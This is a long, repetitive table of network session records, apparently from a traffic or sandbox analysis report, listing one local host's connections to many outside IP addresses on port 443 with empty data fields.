                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10546192.168.2.1440448153.33.218.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10547192.168.2.1436410147.102.92.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10548192.168.2.1453870139.2.71.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10549192.168.2.1445038124.242.129.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10550192.168.2.144240096.54.26.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10551192.168.2.145889298.62.108.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10552192.168.2.1434508124.166.175.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10553192.168.2.1446926197.185.229.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10554192.168.2.143647037.1.42.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10555192.168.2.1446438184.194.244.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10556192.168.2.145255212.182.203.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10557192.168.2.1453342198.5.156.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10558192.168.2.1453452155.15.215.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10559192.168.2.1453342169.96.1.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10560192.168.2.1457886168.126.23.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10561192.168.2.1455430208.140.62.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10562192.168.2.143990474.238.24.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10563192.168.2.1448926145.224.74.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10564192.168.2.1441400220.50.200.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10565192.168.2.145372820.30.69.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10566192.168.2.143951638.90.94.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10567192.168.2.1457750222.219.79.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10568192.168.2.1460040201.119.113.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10569192.168.2.1433420133.64.30.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10570192.168.2.1451990137.130.204.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10571192.168.2.1451838183.101.18.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10572192.168.2.144867475.209.69.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10573192.168.2.1451090134.99.175.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10574192.168.2.144954270.145.49.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10575192.168.2.1436314195.120.14.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10576192.168.2.144777284.233.48.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10577192.168.2.1454522171.104.50.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10578192.168.2.144535440.141.11.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10579192.168.2.145554043.88.47.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10580192.168.2.1434774126.188.207.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10581192.168.2.1448782188.31.216.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10582192.168.2.143876478.86.101.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10583192.168.2.1443714177.183.124.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10584192.168.2.1447010148.214.74.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10585192.168.2.1443896183.184.134.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10586192.168.2.143815450.228.112.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10587192.168.2.1447264221.175.80.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10588192.168.2.1455050222.47.221.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10589192.168.2.1457922221.186.158.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10590192.168.2.1454728206.4.155.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10591192.168.2.145284239.161.122.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10592192.168.2.1443724182.46.18.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10593192.168.2.1437376129.105.171.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10594192.168.2.1438798166.197.90.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10595192.168.2.1433828156.223.1.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10596192.168.2.145585498.85.87.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10597192.168.2.1450668190.63.94.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10598192.168.2.1445304208.131.117.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10599192.168.2.143851899.122.6.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10600192.168.2.1444768175.74.207.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10601192.168.2.14561525.151.71.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10602192.168.2.145393445.140.84.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10603192.168.2.1438608195.48.83.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10604192.168.2.143375644.58.252.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10605192.168.2.144624613.176.192.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10606192.168.2.144683867.13.107.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10607192.168.2.1446274180.133.27.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10608192.168.2.1455232187.17.21.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10609192.168.2.145769842.224.160.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10610192.168.2.145730476.4.120.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10611192.168.2.143934449.134.56.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10612192.168.2.1444432216.172.82.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10613192.168.2.1458874108.96.53.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10614192.168.2.145103079.31.15.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10615192.168.2.1454438149.169.155.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10616192.168.2.1451066100.238.19.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10617192.168.2.145845269.172.21.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10618192.168.2.144423092.164.184.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10619192.168.2.1457286196.35.89.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10620192.168.2.1433088132.169.204.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10621192.168.2.1454984140.97.20.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10622192.168.2.1440114136.242.32.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10623192.168.2.145525627.139.141.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10624192.168.2.143437096.177.181.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10625192.168.2.144607079.16.107.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10626192.168.2.1446522110.195.213.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10627192.168.2.1443266210.4.136.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10628192.168.2.1443698205.38.99.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10629192.168.2.1442772166.114.234.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10630192.168.2.144952036.222.172.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10631192.168.2.144522019.85.215.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10632192.168.2.1433392156.145.77.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10633192.168.2.1446300124.162.29.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10634192.168.2.144851651.97.66.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10635192.168.2.1442778182.125.206.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10636192.168.2.1448638222.224.110.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10637192.168.2.145020686.151.197.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10638192.168.2.1439904162.64.146.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10639192.168.2.1453494174.155.106.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10640192.168.2.1453858103.241.146.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10641192.168.2.144386638.174.91.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10642192.168.2.1451132153.126.66.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10643192.168.2.1436564153.160.149.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10644192.168.2.1455500102.227.254.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10645192.168.2.144322040.98.183.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10646192.168.2.146036246.10.227.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10647192.168.2.1452706138.217.115.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10648192.168.2.1441550172.250.105.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10649192.168.2.1447822178.131.122.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10650192.168.2.1451198140.248.0.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10651192.168.2.145865873.0.226.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10652192.168.2.1460250194.81.181.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10653192.168.2.1434014154.49.246.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10654192.168.2.1456576195.93.103.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10655192.168.2.1436858183.195.110.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10656192.168.2.145880423.11.160.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10657192.168.2.144687286.126.128.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10658192.168.2.144428459.3.45.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10659192.168.2.145290625.142.102.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10660192.168.2.144865418.81.133.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10661192.168.2.145061037.130.70.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10662192.168.2.1458884203.247.149.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10663192.168.2.143945281.149.211.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10664192.168.2.1434584181.123.80.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10665192.168.2.1446334112.11.250.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10666192.168.2.145577662.191.31.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10667192.168.2.1457500120.37.112.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10668192.168.2.143779476.252.233.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10669192.168.2.143431845.155.189.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10670192.168.2.1452474136.104.82.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10671192.168.2.144403472.120.53.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10672192.168.2.1457840210.252.37.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10673192.168.2.1447900105.238.131.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10674192.168.2.145839089.169.244.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10675192.168.2.1433054179.31.19.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10676192.168.2.1451030144.58.236.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10677192.168.2.1437696183.106.224.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10678192.168.2.145953467.5.217.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10679192.168.2.1454982116.155.201.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10680192.168.2.1441366213.24.160.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10681192.168.2.1448950131.3.33.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10682192.168.2.1447396126.113.144.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10683192.168.2.1448898152.33.13.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10684192.168.2.1438500101.132.242.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10685192.168.2.1451110168.193.240.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10686192.168.2.1456838123.101.173.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10687192.168.2.1442698128.197.243.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10688192.168.2.1455862146.2.166.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10689192.168.2.144248086.114.17.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10690192.168.2.1449146149.52.108.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10691192.168.2.144845499.37.191.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10692192.168.2.1437530198.162.164.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10693192.168.2.1452818194.248.157.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10694192.168.2.143510296.13.212.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10695192.168.2.145647070.62.21.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10696192.168.2.1437712186.213.148.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10697192.168.2.1446068122.229.158.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10698192.168.2.1457876183.185.21.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10699192.168.2.1458732185.210.152.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10700192.168.2.1460886147.183.178.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10701192.168.2.1434126143.131.64.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10702192.168.2.144950473.118.12.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10703192.168.2.144686862.230.104.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10704192.168.2.144076459.89.187.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10705192.168.2.1453914172.242.219.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10706192.168.2.1460806181.23.188.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10707192.168.2.143591873.77.249.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10708192.168.2.144797858.34.48.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10709192.168.2.1454758165.111.173.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10710192.168.2.1454542104.20.32.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10711192.168.2.1452086206.67.7.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10712192.168.2.144470482.151.32.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10713192.168.2.145981683.11.142.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10714192.168.2.1459916144.216.53.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10715192.168.2.1448158145.234.61.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10716192.168.2.144720490.192.188.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10717192.168.2.1460940149.212.27.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10718192.168.2.1444392169.112.76.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10719192.168.2.1441426119.128.130.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10720192.168.2.1445488173.141.146.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10721192.168.2.143863653.109.198.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10722192.168.2.1440488109.173.233.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10723192.168.2.1433868206.74.223.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10724192.168.2.1439680141.25.50.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10725192.168.2.1441692155.114.49.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10726192.168.2.1449106196.168.125.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10727192.168.2.1442472205.45.73.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10728192.168.2.1452260213.68.48.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10729192.168.2.1435526147.181.201.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10730192.168.2.1449798165.21.11.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10731192.168.2.1444880158.242.153.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10732192.168.2.1433404142.174.23.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10733192.168.2.143560248.225.125.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10734192.168.2.1446522169.102.127.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10735192.168.2.144526419.78.191.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10736192.168.2.1460846130.202.30.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10737192.168.2.144802098.205.192.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10738192.168.2.144507699.184.249.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10739192.168.2.1443152104.125.191.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10740192.168.2.1433030173.98.131.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10741192.168.2.145964077.17.70.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10742192.168.2.1445164111.18.191.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10743192.168.2.145997034.126.15.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10744192.168.2.145317632.222.21.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10745192.168.2.145762246.174.228.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10746192.168.2.1434914150.59.61.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10747192.168.2.1450790174.221.88.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10748192.168.2.144716695.168.250.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10749192.168.2.1451070186.249.204.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10750192.168.2.1437190132.233.59.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10751192.168.2.1455966149.192.134.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10752192.168.2.144881263.239.47.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10753192.168.2.144936472.156.176.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10754192.168.2.1445604133.68.194.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10755192.168.2.146093271.11.19.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10756192.168.2.1440532177.25.194.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10757192.168.2.143387685.41.231.59443
                                                        TimestampBytes transferredDirectionData


